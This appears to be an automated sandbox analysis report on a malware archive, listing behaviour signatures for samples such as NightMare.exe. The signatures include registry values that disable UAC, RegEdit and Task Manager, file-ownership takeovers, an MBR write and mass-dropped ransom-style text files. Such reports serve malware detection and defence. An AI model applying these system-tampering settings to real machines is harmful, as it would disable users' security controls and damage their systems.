Analysis Overview
SHA256
332596c3a5a92c4dfbdb3de366d9ab8601f87644c1b4ee7ca416507d859cf284
Threat Level: Known bad
The file MyMalwareDatabase-main.zip was found to be: Known bad.
Malicious Activity Summary
Modifies WinLogon for persistence
UAC bypass
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Possible privilege escalation attempt
Modifies system executable filetype association
Loads dropped DLL
Executes dropped EXE
UPX packed file
Checks computer location settings
Modifies file permissions
Drops desktop.ini file(s)
Modifies WinLogon
Writes to the Master Boot Record (MBR)
Checks whether UAC is enabled
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Unsigned PE
Program crash
Enumerates physical storage devices
NSIS installer
Modifies data under HKEY_USERS
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Modifies Control Panel
Modifies registry key
Kills process with taskkill
System policy modification
Modifies registry class
Modifies File Icons
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-03 13:15
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral14
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Losange.exe
"C:\Users\Admin\AppData\Local\Temp\Losange.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/1400-0-0x00007FF798630000-0x00007FF798656000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win7-20240221-en
Max time kernel
150s
Max time network
122s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe
"C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\Monoxidex64.exe"
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-03-03 13:14
Reported
2024-03-03 13:17
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
155s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | C:\Windows\system32\svchost.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\Recovery | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Recovery\ReAgent.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7415).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2008).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(527).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3522).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3621).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4317).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9716).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(503).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7741).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9568).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6943).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1150).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2291).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(221).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1672).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2638).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6957).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7999).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8569).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1442).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6509).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3896).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3970).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4757).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7724).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9871).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3188).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7442).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9571).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(395).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4477).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1140).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4908).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(794).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1918).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2491).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5020).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6406).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7376).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8152).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8958).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(663).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4655).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3515).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4274).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4528).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6536).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7065).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1876).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3425).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4535).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7480).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7638).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8272).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1393).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6132).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4646).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6551).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1333).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1785).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4743).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5750).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1325).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2624).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\Cursors\Hand = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
